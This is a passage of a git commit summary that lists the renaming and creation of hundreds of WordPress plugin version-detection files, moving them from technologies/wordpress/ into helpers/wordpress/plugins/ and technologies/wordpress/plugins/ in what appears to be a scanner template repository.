.../wp-smushit.yaml} | 6 +-- .../wp-statistics.yaml} | 6 +-- .../wp-super-cache.yaml} | 6 +-- .../wp-user-avatar.yaml} | 6 +-- .../wpcf7-recaptcha.yaml} | 6 +-- .../wpcf7-redirect.yaml} | 6 +-- .../wpforms-lite.yaml} | 6 +-- .../wps-hide-login.yaml} | 6 +-- .../yith-woocommerce-compare.yaml} | 6 +-- .../yith-woocommerce-wishlist.yaml} | 6 +-- .../wordpress/wordpress-adminimize.txt | 1 - .../wordpress-advanced-custom-fields.txt | 1 - .../wordpress-all-in-one-seo-pack.txt | 1 - ...ss-all-in-one-wp-security-and-firewall.txt | 1 - .../wordpress/wordpress-astra-sites.txt | 1 - .../wordpress-click-to-chat-for-whatsapp.txt | 1 - technologies/wordpress/wordpress-coblocks.txt | 1 - .../wordpress/wordpress-complianz-gdpr.txt | 1 - .../wordpress/wordpress-contact-form-7.txt | 1 - ...ress-creative-mail-by-constant-contact.txt | 1 - .../wordpress-custom-post-type-ui.txt | 1 - .../wordpress/wordpress-disable-comments.txt | 1 - .../wordpress/wordpress-easy-fancybox.txt | 1 - .../wordpress/wordpress-elementor.txt | 1 - .../wordpress/wordpress-elementskit-lite.txt | 1 - ...ss-essential-addons-for-elementor-lite.txt | 1 - .../wordpress-ewww-image-optimizer.txt | 1 - .../wordpress-facebook-for-woocommerce.txt | 1 - .../wordpress/wordpress-formidable.txt | 1 - ...ress-google-analytics-dashboard-for-wp.txt | 1 - ...rdpress-google-analytics-for-wordpress.txt | 1 - .../wordpress-google-listings-and-ads.txt | 1 - .../wordpress/wordpress-gutenberg.txt | 1 - .../wordpress-header-footer-code-manager.txt | 1 - technologies/wordpress/wordpress-imagify.txt | 1 - .../wordpress-insert-headers-and-footers.txt | 1 - technologies/wordpress/wordpress-jetpack.txt | 1 - ...ordpress-limit-login-attempts-reloaded.txt | 1 - .../wordpress/wordpress-litespeed-cache.txt | 1 - technologies/wordpress/wordpress-mailpoet.txt | 1 - .../wordpress/wordpress-mainwp-child.txt | 1 - technologies/wordpress/wordpress-meta-box.txt | 1 - .../wordpress/wordpress-newsletter.txt | 1 - .../wordpress/wordpress-post-duplicator.txt | 1 - .../wordpress/wordpress-post-duplicator.yaml | 50 ------------------- .../wordpress/wordpress-post-smtp.txt | 1 - ...wordpress-premium-addons-for-elementor.txt | 1 - .../wordpress/wordpress-pretty-link.txt | 1 - .../wordpress/wordpress-redirection.txt | 1 - .../wordpress/wordpress-siteorigin-panels.txt | 1 - .../wordpress/wordpress-so-widgets-bundle.txt | 1 - .../wordpress/wordpress-sucuri-scanner.txt | 1 - .../wordpress/wordpress-svg-support.txt | 1 - .../wordpress-table-of-contents-plus.txt | 1 - .../wordpress-the-events-calendar.txt | 1 - .../wordpress-translatepress-multilingual.txt | 1 - ...ordpress-ultimate-addons-for-gutenberg.txt | 1 - .../wordpress/wordpress-updraftplus.txt | 1 - .../wordpress/wordpress-user-role-editor.txt | 1 - .../wordpress/wordpress-w3-total-cache.txt | 1 - ...ordpress-woo-cart-abandonment-recovery.txt | 1 - ...ordpress-woo-checkout-field-editor-pro.txt | 1 - .../wordpress-woocommerce-paypal-payments.txt | 1 - ...woocommerce-pdf-invoices-packing-slips.txt | 1 - .../wordpress/wordpress-woocommerce.txt | 1 - .../wordpress/wordpress-wordfence.txt | 1 - .../wordpress/wordpress-wordpress-seo.txt | 1 - .../wordpress/wordpress-wp-fastest-cache.txt | 1 - .../wordpress/wordpress-wp-file-manager.txt | 1 - .../wordpress/wordpress-wp-google-maps.txt | 1 - .../wordpress/wordpress-wp-mail-smtp.txt | 1 - .../wordpress-wp-maintenance-mode.txt | 1 - .../wordpress/wordpress-wp-optimize.txt | 1 - .../wordpress/wordpress-wp-super-cache.txt | 1 - .../wordpress/wordpress-wp-user-avatar.txt | 1 - 465 files changed, 711 insertions(+), 711 deletions(-) rename technologies/wordpress/wordpress-ad-inserter.txt => helpers/wordpress/plugins/ad-inserter.txt (100%) rename technologies/wordpress/wordpress-add-to-any.txt => helpers/wordpress/plugins/add-to-any.txt (100%) rename technologies/wordpress/wordpress-admin-menu-editor.txt => helpers/wordpress/plugins/admin-menu-editor.txt (100%) create mode 100644 helpers/wordpress/plugins/adminimize.txt create mode 100644 helpers/wordpress/plugins/advanced-custom-fields.txt rename technologies/wordpress/wordpress-akismet.txt => helpers/wordpress/plugins/akismet.txt (100%) rename technologies/wordpress/wordpress-all-404-redirect-to-homepage.txt => helpers/wordpress/plugins/all-404-redirect-to-homepage.txt (100%) create mode 100644 helpers/wordpress/plugins/all-in-one-seo-pack.txt rename technologies/wordpress/wordpress-all-in-one-wp-migration.txt => helpers/wordpress/plugins/all-in-one-wp-migration.txt (100%) create mode 100644 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt rename technologies/wordpress/wordpress-amp.txt => helpers/wordpress/plugins/amp.txt (100%) rename technologies/wordpress/wordpress-antispam-bee.txt => helpers/wordpress/plugins/antispam-bee.txt (100%) create mode 100644 helpers/wordpress/plugins/astra-sites.txt rename technologies/wordpress/wordpress-astra-widgets.txt => helpers/wordpress/plugins/astra-widgets.txt (100%) rename technologies/wordpress/wordpress-autoptimize.txt => helpers/wordpress/plugins/autoptimize.txt (100%) rename technologies/wordpress/wordpress-backwpup.txt => helpers/wordpress/plugins/backwpup.txt (100%) rename technologies/wordpress/wordpress-better-search-replace.txt => helpers/wordpress/plugins/better-search-replace.txt (100%) rename technologies/wordpress/wordpress-better-wp-security.txt => helpers/wordpress/plugins/better-wp-security.txt (100%) rename technologies/wordpress/wordpress-black-studio-tinymce-widget.txt => helpers/wordpress/plugins/black-studio-tinymce-widget.txt (100%) rename technologies/wordpress/wordpress-breadcrumb-navxt.txt => helpers/wordpress/plugins/breadcrumb-navxt.txt (100%) rename technologies/wordpress/wordpress-broken-link-checker.txt => helpers/wordpress/plugins/broken-link-checker.txt (100%) rename technologies/wordpress/wordpress-child-theme-configurator.txt => helpers/wordpress/plugins/child-theme-configurator.txt (100%) rename technologies/wordpress/wordpress-classic-editor.txt => helpers/wordpress/plugins/classic-editor.txt (100%) rename technologies/wordpress/wordpress-classic-widgets.txt => helpers/wordpress/plugins/classic-widgets.txt (100%) create mode 100644 helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt rename technologies/wordpress/wordpress-cloudflare.txt => helpers/wordpress/plugins/cloudflare.txt (100%) rename technologies/wordpress/wordpress-cmb2.txt => helpers/wordpress/plugins/cmb2.txt (100%) create mode 100644 helpers/wordpress/plugins/coblocks.txt rename technologies/wordpress/wordpress-code-snippets.txt => helpers/wordpress/plugins/code-snippets.txt (100%) rename technologies/wordpress/wordpress-coming-soon.txt => helpers/wordpress/plugins/coming-soon.txt (100%) create mode 100644 helpers/wordpress/plugins/complianz-gdpr.txt rename technologies/wordpress/wordpress-contact-form-7-honeypot.txt => helpers/wordpress/plugins/contact-form-7-honeypot.txt (100%) create mode 100644 helpers/wordpress/plugins/contact-form-7.txt rename technologies/wordpress/wordpress-contact-form-cfdb7.txt => helpers/wordpress/plugins/contact-form-cfdb7.txt (100%) create mode 100644 helpers/wordpress/plugins/cookie-law-info.txt create mode 100644 helpers/wordpress/plugins/cookie-notice.txt rename technologies/wordpress/wordpress-creame-whatsapp-me.txt => helpers/wordpress/plugins/creame-whatsapp-me.txt (100%) create mode 100644 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt rename technologies/wordpress/wordpress-custom-css-js.txt => helpers/wordpress/plugins/custom-css-js.txt (100%) rename technologies/wordpress/wordpress-custom-fonts.txt => helpers/wordpress/plugins/custom-fonts.txt (100%) create mode 100644 helpers/wordpress/plugins/custom-post-type-ui.txt rename technologies/wordpress/wordpress-cookie-notice.txt => helpers/wordpress/plugins/disable-comments.txt (100%) rename technologies/wordpress/wordpress-disable-gutenberg.txt => helpers/wordpress/plugins/disable-gutenberg.txt (100%) rename technologies/wordpress/wordpress-duplicate-page.txt => helpers/wordpress/plugins/duplicate-page.txt (100%) rename technologies/wordpress/wordpress-duplicate-post.txt => helpers/wordpress/plugins/duplicate-post.txt (100%) rename technologies/wordpress/wordpress-duplicator.txt => helpers/wordpress/plugins/duplicator.txt (100%) rename technologies/wordpress/wordpress-duracelltomi-google-tag-manager.txt => helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt (100%) create mode 100644 helpers/wordpress/plugins/easy-fancybox.txt rename technologies/wordpress/wordpress-easy-google-fonts.txt => helpers/wordpress/plugins/easy-google-fonts.txt (100%) rename technologies/wordpress/wordpress-easy-table-of-contents.txt => helpers/wordpress/plugins/easy-table-of-contents.txt (100%) rename technologies/wordpress/wordpress-easy-wp-smtp.txt => helpers/wordpress/plugins/easy-wp-smtp.txt (100%) create mode 100644 helpers/wordpress/plugins/elementor.txt create mode 100644 helpers/wordpress/plugins/elementskit-lite.txt rename technologies/wordpress/wordpress-enable-media-replace.txt => helpers/wordpress/plugins/enable-media-replace.txt (100%) rename technologies/wordpress/wordpress-envato-elements.txt => helpers/wordpress/plugins/envato-elements.txt (100%) create mode 100644 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt create mode 100644 helpers/wordpress/plugins/ewww-image-optimizer.txt rename technologies/wordpress/wordpress-cookie-law-info.txt => helpers/wordpress/plugins/facebook-for-woocommerce.txt (100%) rename technologies/wordpress/wordpress-favicon-by-realfavicongenerator.txt => helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt (100%) rename technologies/wordpress/wordpress-flamingo.txt => helpers/wordpress/plugins/flamingo.txt (100%) rename technologies/wordpress/wordpress-fluentform.txt => helpers/wordpress/plugins/fluentform.txt (100%) rename technologies/wordpress/wordpress-font-awesome.txt => helpers/wordpress/plugins/font-awesome.txt (100%) rename technologies/wordpress/wordpress-force-regenerate-thumbnails.txt => helpers/wordpress/plugins/force-regenerate-thumbnails.txt (100%) create mode 100644 helpers/wordpress/plugins/formidable.txt rename technologies/wordpress/wordpress-forminator.txt => helpers/wordpress/plugins/forminator.txt (100%) rename technologies/wordpress/wordpress-ga-google-analytics.txt => helpers/wordpress/plugins/ga-google-analytics.txt (100%) create mode 100644 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt create mode 100644 helpers/wordpress/plugins/google-analytics-for-wordpress.txt create mode 100644 helpers/wordpress/plugins/google-listings-and-ads.txt rename technologies/wordpress/wordpress-google-site-kit.txt => helpers/wordpress/plugins/google-site-kit.txt (100%) rename technologies/wordpress/wordpress-google-sitemap-generator.txt => helpers/wordpress/plugins/google-sitemap-generator.txt (100%) rename technologies/wordpress/wordpress-gtranslate.txt => helpers/wordpress/plugins/gtranslate.txt (100%) create mode 100644 helpers/wordpress/plugins/gutenberg.txt rename technologies/wordpress/wordpress-happy-elementor-addons.txt => helpers/wordpress/plugins/happy-elementor-addons.txt (100%) rename technologies/wordpress/wordpress-header-and-footer-scripts.txt => helpers/wordpress/plugins/header-and-footer-scripts.txt (100%) create mode 100644 helpers/wordpress/plugins/header-footer-code-manager.txt rename technologies/wordpress/wordpress-header-footer-elementor.txt => helpers/wordpress/plugins/header-footer-elementor.txt (100%) rename technologies/wordpress/wordpress-header-footer.txt => helpers/wordpress/plugins/header-footer.txt (100%) rename technologies/wordpress/wordpress-health-check.txt => helpers/wordpress/plugins/health-check.txt (100%) rename technologies/wordpress/wordpress-hello-dolly.txt => helpers/wordpress/plugins/hello-dolly.txt (100%) create mode 100644 helpers/wordpress/plugins/imagify.txt rename technologies/wordpress/wordpress-imsanity.txt => helpers/wordpress/plugins/imsanity.txt (100%) create mode 100644 helpers/wordpress/plugins/insert-headers-and-footers.txt rename technologies/wordpress/wordpress-instagram-feed.txt => helpers/wordpress/plugins/instagram-feed.txt (100%) rename technologies/wordpress/wordpress-intuitive-custom-post-order.txt => helpers/wordpress/plugins/intuitive-custom-post-order.txt (100%) rename technologies/wordpress/wordpress-iwp-client.txt => helpers/wordpress/plugins/iwp-client.txt (100%) create mode 100644 helpers/wordpress/plugins/jetpack.txt rename technologies/wordpress/wordpress-kadence-blocks.txt => helpers/wordpress/plugins/kadence-blocks.txt (100%) rename technologies/wordpress/wordpress-kirki.txt => helpers/wordpress/plugins/kirki.txt (100%) rename technologies/wordpress/wordpress-leadin.txt => helpers/wordpress/plugins/leadin.txt (100%) create mode 100644 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt rename technologies/wordpress/wordpress-limit-login-attempts.txt => helpers/wordpress/plugins/limit-login-attempts.txt (100%) create mode 100644 helpers/wordpress/plugins/litespeed-cache.txt rename technologies/wordpress/wordpress-loco-translate.txt => helpers/wordpress/plugins/loco-translate.txt (100%) rename technologies/wordpress/wordpress-loginizer.txt => helpers/wordpress/plugins/loginizer.txt (100%) rename technologies/wordpress/wordpress-loginpress.txt => helpers/wordpress/plugins/loginpress.txt (100%) rename technologies/wordpress/wordpress-mailchimp-for-woocommerce.txt => helpers/wordpress/plugins/mailchimp-for-woocommerce.txt (100%) rename technologies/wordpress/wordpress-mailchimp-for-wp.txt => helpers/wordpress/plugins/mailchimp-for-wp.txt (100%) create mode 100644 helpers/wordpress/plugins/mailpoet.txt rename technologies/wordpress/wordpress-maintenance.txt => helpers/wordpress/plugins/maintenance.txt (100%) create mode 100644 helpers/wordpress/plugins/mainwp-child.txt rename technologies/wordpress/wordpress-malcare-security.txt => helpers/wordpress/plugins/malcare-security.txt (100%) rename technologies/wordpress/wordpress-megamenu.txt => helpers/wordpress/plugins/megamenu.txt (100%) rename technologies/wordpress/wordpress-members.txt => helpers/wordpress/plugins/members.txt (100%) create mode 100644 helpers/wordpress/plugins/meta-box.txt rename technologies/wordpress/wordpress-ml-slider.txt => helpers/wordpress/plugins/ml-slider.txt (100%) create mode 100644 helpers/wordpress/plugins/newsletter.txt rename technologies/wordpress/wordpress-nextend-facebook-connect.txt => helpers/wordpress/plugins/nextend-facebook-connect.txt (100%) rename technologies/wordpress/wordpress-nextgen-gallery.txt => helpers/wordpress/plugins/nextgen-gallery.txt (100%) rename technologies/wordpress/wordpress-ninja-forms.txt => helpers/wordpress/plugins/ninja-forms.txt (100%) rename technologies/wordpress/wordpress-ocean-extra.txt => helpers/wordpress/plugins/ocean-extra.txt (100%) rename technologies/wordpress/wordpress-official-facebook-pixel.txt => helpers/wordpress/plugins/official-facebook-pixel.txt (100%) rename technologies/wordpress/wordpress-one-click-demo-import.txt => helpers/wordpress/plugins/one-click-demo-import.txt (100%) rename technologies/wordpress/wordpress-optinmonster.txt => helpers/wordpress/plugins/optinmonster.txt (100%) rename technologies/wordpress/wordpress-password-protected.txt => helpers/wordpress/plugins/password-protected.txt (100%) rename technologies/wordpress/wordpress-pdf-embedder.txt => helpers/wordpress/plugins/pdf-embedder.txt (100%) rename technologies/wordpress/wordpress-photo-gallery.txt => helpers/wordpress/plugins/photo-gallery.txt (100%) rename technologies/wordpress/wordpress-php-compatibility-checker.txt => helpers/wordpress/plugins/php-compatibility-checker.txt (100%) rename technologies/wordpress/wordpress-pixelyoursite.txt => helpers/wordpress/plugins/pixelyoursite.txt (100%) rename technologies/wordpress/wordpress-polylang.txt => helpers/wordpress/plugins/polylang.txt (100%) rename technologies/wordpress/wordpress-popup-builder.txt => helpers/wordpress/plugins/popup-builder.txt (100%) rename technologies/wordpress/wordpress-popup-maker.txt => helpers/wordpress/plugins/popup-maker.txt (100%) create mode 100644 helpers/wordpress/plugins/post-smtp.txt rename technologies/wordpress/wordpress-post-types-order.txt => helpers/wordpress/plugins/post-types-order.txt (100%) create mode 100644 helpers/wordpress/plugins/premium-addons-for-elementor.txt create mode 100644 helpers/wordpress/plugins/pretty-link.txt rename technologies/wordpress/wordpress-really-simple-captcha.txt => helpers/wordpress/plugins/really-simple-captcha.txt (100%) rename technologies/wordpress/wordpress-really-simple-ssl.txt => helpers/wordpress/plugins/really-simple-ssl.txt (100%) create mode 100644 helpers/wordpress/plugins/redirection.txt rename technologies/wordpress/wordpress-redux-framework.txt => helpers/wordpress/plugins/redux-framework.txt (100%) rename technologies/wordpress/wordpress-regenerate-thumbnails.txt => helpers/wordpress/plugins/regenerate-thumbnails.txt (100%) rename technologies/wordpress/wordpress-safe-svg.txt => helpers/wordpress/plugins/safe-svg.txt (100%) rename technologies/wordpress/wordpress-seo-by-rank-math.txt => helpers/wordpress/plugins/seo-by-rank-math.txt (100%) rename technologies/wordpress/wordpress-sg-cachepress.txt => helpers/wordpress/plugins/sg-cachepress.txt (100%) rename technologies/wordpress/wordpress-sg-security.txt => helpers/wordpress/plugins/sg-security.txt (100%) rename technologies/wordpress/wordpress-shortcodes-ultimate.txt => helpers/wordpress/plugins/shortcodes-ultimate.txt (100%) rename technologies/wordpress/wordpress-shortpixel-image-optimiser.txt => helpers/wordpress/plugins/shortpixel-image-optimiser.txt (100%) rename technologies/wordpress/wordpress-simple-custom-post-order.txt => helpers/wordpress/plugins/simple-custom-post-order.txt (100%) rename technologies/wordpress/wordpress-simple-page-ordering.txt => helpers/wordpress/plugins/simple-page-ordering.txt (100%) rename technologies/wordpress/wordpress-siteguard.txt => helpers/wordpress/plugins/siteguard.txt (100%) rename technologies/wordpress/wordpress-yith-woocommerce-compare.txt => helpers/wordpress/plugins/siteorigin-panels.txt (100%) rename technologies/wordpress/wordpress-smart-slider-3.txt => helpers/wordpress/plugins/smart-slider-3.txt (100%) create mode 100644 helpers/wordpress/plugins/so-widgets-bundle.txt rename technologies/wordpress/wordpress-ssl-insecure-content-fixer.txt => helpers/wordpress/plugins/ssl-insecure-content-fixer.txt (100%) rename technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.txt => helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt (100%) create mode 100644 helpers/wordpress/plugins/sucuri-scanner.txt create mode 100644 helpers/wordpress/plugins/svg-support.txt create mode 100644 helpers/wordpress/plugins/table-of-contents-plus.txt rename technologies/wordpress/wordpress-tablepress.txt => helpers/wordpress/plugins/tablepress.txt (100%) rename technologies/wordpress/wordpress-taxonomy-terms-order.txt => helpers/wordpress/plugins/taxonomy-terms-order.txt (100%) create mode 100644 helpers/wordpress/plugins/the-events-calendar.txt rename technologies/wordpress/wordpress-themeisle-companion.txt => helpers/wordpress/plugins/themeisle-companion.txt (100%) rename technologies/wordpress/wordpress-tinymce-advanced.txt => helpers/wordpress/plugins/tinymce-advanced.txt (100%) create mode 100644 helpers/wordpress/plugins/translatepress-multilingual.txt create mode 100644 helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt rename technologies/wordpress/wordpress-under-construction-page.txt => helpers/wordpress/plugins/under-construction-page.txt (100%) rename technologies/wordpress/wordpress-unyson.txt => helpers/wordpress/plugins/unyson.txt (100%) create mode 100644 helpers/wordpress/plugins/updraftplus.txt rename technologies/wordpress/wordpress-use-any-font.txt => helpers/wordpress/plugins/use-any-font.txt (100%) create mode 100644 helpers/wordpress/plugins/user-role-editor.txt rename technologies/wordpress/wordpress-velvet-blues-update-urls.txt => helpers/wordpress/plugins/velvet-blues-update-urls.txt (100%) create mode 100644 helpers/wordpress/plugins/w3-total-cache.txt create mode 100644 helpers/wordpress/plugins/webp-converter-for-media.txt rename technologies/wordpress/wordpress-widget-importer-exporter.txt => helpers/wordpress/plugins/widget-importer-exporter.txt (100%) create mode 100644 helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt create mode 100644 helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt rename technologies/wordpress/wordpress-woo-variation-swatches.txt => helpers/wordpress/plugins/woo-variation-swatches.txt (100%) rename technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.txt => helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt (100%) rename technologies/wordpress/wordpress-woocommerce-gateway-stripe.txt => helpers/wordpress/plugins/woocommerce-gateway-stripe.txt (100%) rename technologies/wordpress/wordpress-woocommerce-payments.txt => helpers/wordpress/plugins/woocommerce-payments.txt (100%) create mode 100644 helpers/wordpress/plugins/woocommerce-paypal-payments.txt create mode 100644 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt rename technologies/wordpress/wordpress-woocommerce-services.txt => helpers/wordpress/plugins/woocommerce-services.txt (100%) create mode 100644 helpers/wordpress/plugins/woocommerce.txt rename technologies/wordpress/wordpress-woosidebars.txt => helpers/wordpress/plugins/woosidebars.txt (100%) create mode 100644 helpers/wordpress/plugins/wordfence.txt rename technologies/wordpress/wordpress-wordpress-importer.txt => helpers/wordpress/plugins/wordpress-importer.txt (100%) create mode 100644 helpers/wordpress/plugins/wordpress-seo.txt rename technologies/wordpress/wordpress-worker.txt => helpers/wordpress/plugins/worker.txt (100%) create mode 100644 helpers/wordpress/plugins/wp-fastest-cache.txt create mode 100644 helpers/wordpress/plugins/wp-file-manager.txt create mode 100644 helpers/wordpress/plugins/wp-google-maps.txt create mode 100644 helpers/wordpress/plugins/wp-mail-smtp.txt create mode 100644 helpers/wordpress/plugins/wp-maintenance-mode.txt rename technologies/wordpress/wordpress-wp-migrate-db.txt => helpers/wordpress/plugins/wp-migrate-db.txt (100%) rename technologies/wordpress/wordpress-wp-multibyte-patch.txt => helpers/wordpress/plugins/wp-multibyte-patch.txt (100%) create mode 100644 helpers/wordpress/plugins/wp-optimize.txt rename technologies/wordpress/wordpress-wp-pagenavi.txt => helpers/wordpress/plugins/wp-pagenavi.txt (100%) rename technologies/wordpress/wordpress-wp-reset.txt => helpers/wordpress/plugins/wp-reset.txt (100%) rename technologies/wordpress/wordpress-wp-sitemap-page.txt => helpers/wordpress/plugins/wp-sitemap-page.txt (100%) rename technologies/wordpress/wordpress-wp-smushit.txt => helpers/wordpress/plugins/wp-smushit.txt (100%) rename technologies/wordpress/wordpress-wp-statistics.txt => helpers/wordpress/plugins/wp-statistics.txt (100%) create mode 100644 helpers/wordpress/plugins/wp-super-cache.txt create mode 100644 helpers/wordpress/plugins/wp-user-avatar.txt rename technologies/wordpress/wordpress-wpcf7-recaptcha.txt => helpers/wordpress/plugins/wpcf7-recaptcha.txt (100%) rename technologies/wordpress/wordpress-wpcf7-redirect.txt => helpers/wordpress/plugins/wpcf7-redirect.txt (100%) rename technologies/wordpress/wordpress-wpforms-lite.txt => helpers/wordpress/plugins/wpforms-lite.txt (100%) rename technologies/wordpress/wordpress-wps-hide-login.txt => helpers/wordpress/plugins/wps-hide-login.txt (100%) create mode 100644 helpers/wordpress/plugins/yith-woocommerce-compare.txt rename technologies/wordpress/wordpress-yith-woocommerce-wishlist.txt => helpers/wordpress/plugins/yith-woocommerce-wishlist.txt (100%) rename technologies/wordpress/{wordpress-ad-inserter.yaml => plugins/ad-inserter.yaml} (86%) rename technologies/wordpress/{wordpress-add-to-any.yaml => plugins/add-to-any.yaml} (87%) rename technologies/wordpress/{wordpress-admin-menu-editor.yaml => plugins/admin-menu-editor.yaml} (87%) rename technologies/wordpress/{wordpress-adminimize.yaml => plugins/adminimize.yaml} (88%) rename technologies/wordpress/{wordpress-advanced-custom-fields.yaml => plugins/advanced-custom-fields.yaml} (86%) rename technologies/wordpress/{wordpress-akismet.yaml => plugins/akismet.yaml} (86%) rename technologies/wordpress/{wordpress-all-404-redirect-to-homepage.yaml => plugins/all-404-redirect-to-homepage.yaml} (84%) rename technologies/wordpress/{wordpress-all-in-one-seo-pack.yaml => plugins/all-in-one-seo-pack.yaml} (81%) rename technologies/wordpress/{wordpress-all-in-one-wp-migration.yaml => plugins/all-in-one-wp-migration.yaml} (86%) rename technologies/wordpress/{wordpress-all-in-one-wp-security-and-firewall.yaml => plugins/all-in-one-wp-security-and-firewall.yaml} (84%) rename technologies/wordpress/{wordpress-amp.yaml => plugins/amp.yaml} (89%) rename technologies/wordpress/{wordpress-antispam-bee.yaml => plugins/antispam-bee.yaml} (87%) rename technologies/wordpress/{wordpress-astra-sites.yaml => plugins/astra-sites.yaml} (83%) rename technologies/wordpress/{wordpress-astra-widgets.yaml => plugins/astra-widgets.yaml} (88%) rename technologies/wordpress/{wordpress-autoptimize.yaml => plugins/autoptimize.yaml} (87%) rename technologies/wordpress/{wordpress-backwpup.yaml => plugins/backwpup.yaml} (85%) rename technologies/wordpress/{wordpress-better-search-replace.yaml => plugins/better-search-replace.yaml} (86%) rename technologies/wordpress/{wordpress-better-wp-security.yaml => plugins/better-wp-security.yaml} (87%) rename technologies/wordpress/{wordpress-black-studio-tinymce-widget.yaml => plugins/black-studio-tinymce-widget.yaml} (86%) rename technologies/wordpress/{wordpress-breadcrumb-navxt.yaml => plugins/breadcrumb-navxt.yaml} (87%) rename technologies/wordpress/{wordpress-broken-link-checker.yaml => plugins/broken-link-checker.yaml} (86%) rename technologies/wordpress/{wordpress-child-theme-configurator.yaml => plugins/child-theme-configurator.yaml} (87%) rename technologies/wordpress/{wordpress-classic-editor.yaml => plugins/classic-editor.yaml} (87%) rename technologies/wordpress/{wordpress-classic-widgets.yaml => plugins/classic-widgets.yaml} (87%) rename technologies/wordpress/{wordpress-click-to-chat-for-whatsapp.yaml => plugins/click-to-chat-for-whatsapp.yaml} (87%) rename technologies/wordpress/{wordpress-cloudflare.yaml => plugins/cloudflare.yaml} (88%) rename technologies/wordpress/{wordpress-cmb2.yaml => plugins/cmb2.yaml} (89%) rename technologies/wordpress/{wordpress-coblocks.yaml => plugins/coblocks.yaml} (86%) rename technologies/wordpress/{wordpress-code-snippets.yaml => plugins/code-snippets.yaml} (87%) rename technologies/wordpress/{wordpress-coming-soon.yaml => plugins/coming-soon.yaml} (81%) rename technologies/wordpress/{wordpress-complianz-gdpr.yaml => plugins/complianz-gdpr.yaml} (86%) rename technologies/wordpress/{wordpress-contact-form-7-honeypot.yaml => plugins/contact-form-7-honeypot.yaml} (86%) rename technologies/wordpress/{wordpress-contact-form-7.yaml => plugins/contact-form-7.yaml} (87%) rename technologies/wordpress/{wordpress-contact-form-cfdb7.yaml => plugins/contact-form-cfdb7.yaml} (86%) rename technologies/wordpress/{wordpress-cookie-law-info.yaml => plugins/cookie-law-info.yaml} (83%) rename technologies/wordpress/{wordpress-cookie-notice.yaml => plugins/cookie-notice.yaml} (85%) rename technologies/wordpress/{wordpress-creame-whatsapp-me.yaml => plugins/creame-whatsapp-me.yaml} (88%) rename technologies/wordpress/{wordpress-creative-mail-by-constant-contact.yaml => plugins/creative-mail-by-constant-contact.yaml} (83%) rename technologies/wordpress/{wordpress-custom-css-js.yaml => plugins/custom-css-js.yaml} (87%) rename technologies/wordpress/{wordpress-custom-fonts.yaml => plugins/custom-fonts.yaml} (88%) rename technologies/wordpress/{wordpress-custom-post-type-ui.yaml => plugins/custom-post-type-ui.yaml} (86%) rename technologies/wordpress/{wordpress-disable-comments.yaml => plugins/disable-comments.yaml} (83%) rename technologies/wordpress/{wordpress-disable-gutenberg.yaml => plugins/disable-gutenberg.yaml} (87%) rename technologies/wordpress/{wordpress-duplicate-page.yaml => plugins/duplicate-page.yaml} (87%) rename technologies/wordpress/{wordpress-duplicate-post.yaml => plugins/duplicate-post.yaml} (87%) rename technologies/wordpress/{wordpress-duplicator.yaml => plugins/duplicator.yaml} (85%) rename technologies/wordpress/{wordpress-duracelltomi-google-tag-manager.yaml => plugins/duracelltomi-google-tag-manager.yaml} (88%) rename technologies/wordpress/{wordpress-easy-fancybox.yaml => plugins/easy-fancybox.yaml} (88%) rename technologies/wordpress/{wordpress-easy-google-fonts.yaml => plugins/easy-google-fonts.yaml} (87%) rename technologies/wordpress/{wordpress-easy-table-of-contents.yaml => plugins/easy-table-of-contents.yaml} (87%) rename technologies/wordpress/{wordpress-easy-wp-smtp.yaml => plugins/easy-wp-smtp.yaml} (87%) rename technologies/wordpress/{wordpress-elementor.yaml => plugins/elementor.yaml} (86%) rename technologies/wordpress/{wordpress-elementskit-lite.yaml => plugins/elementskit-lite.yaml} (80%) rename technologies/wordpress/{wordpress-enable-media-replace.yaml => plugins/enable-media-replace.yaml} (87%) rename technologies/wordpress/{wordpress-envato-elements.yaml => plugins/envato-elements.yaml} (84%) rename technologies/wordpress/{wordpress-essential-addons-for-elementor-lite.yaml => plugins/essential-addons-for-elementor-lite.yaml} (85%) rename technologies/wordpress/{wordpress-ewww-image-optimizer.yaml => plugins/ewww-image-optimizer.yaml} (86%) rename technologies/wordpress/{wordpress-facebook-for-woocommerce.yaml => plugins/facebook-for-woocommerce.yaml} (86%) rename technologies/wordpress/{wordpress-favicon-by-realfavicongenerator.yaml => plugins/favicon-by-realfavicongenerator.yaml} (86%) rename technologies/wordpress/{wordpress-flamingo.yaml => plugins/flamingo.yaml} (88%) rename technologies/wordpress/{wordpress-fluentform.yaml => plugins/fluentform.yaml} (82%) rename technologies/wordpress/{wordpress-font-awesome.yaml => plugins/font-awesome.yaml} (88%) rename technologies/wordpress/{wordpress-force-regenerate-thumbnails.yaml => plugins/force-regenerate-thumbnails.yaml} (86%) rename technologies/wordpress/{wordpress-formidable.yaml => plugins/formidable.yaml} (83%) rename technologies/wordpress/{wordpress-forminator.yaml => plugins/forminator.yaml} (84%) rename technologies/wordpress/{wordpress-ga-google-analytics.yaml => plugins/ga-google-analytics.yaml} (86%) rename technologies/wordpress/{wordpress-google-analytics-dashboard-for-wp.yaml => plugins/google-analytics-dashboard-for-wp.yaml} (82%) rename technologies/wordpress/{wordpress-google-analytics-for-wordpress.yaml => plugins/google-analytics-for-wordpress.yaml} (82%) rename technologies/wordpress/{wordpress-google-listings-and-ads.yaml => plugins/google-listings-and-ads.yaml} (87%) rename technologies/wordpress/{wordpress-google-site-kit.yaml => plugins/google-site-kit.yaml} (83%) rename technologies/wordpress/{wordpress-google-sitemap-generator.yaml => plugins/google-sitemap-generator.yaml} (87%) rename technologies/wordpress/{wordpress-gtranslate.yaml => plugins/gtranslate.yaml} (86%) rename technologies/wordpress/{wordpress-gutenberg.yaml => plugins/gutenberg.yaml} (88%) rename 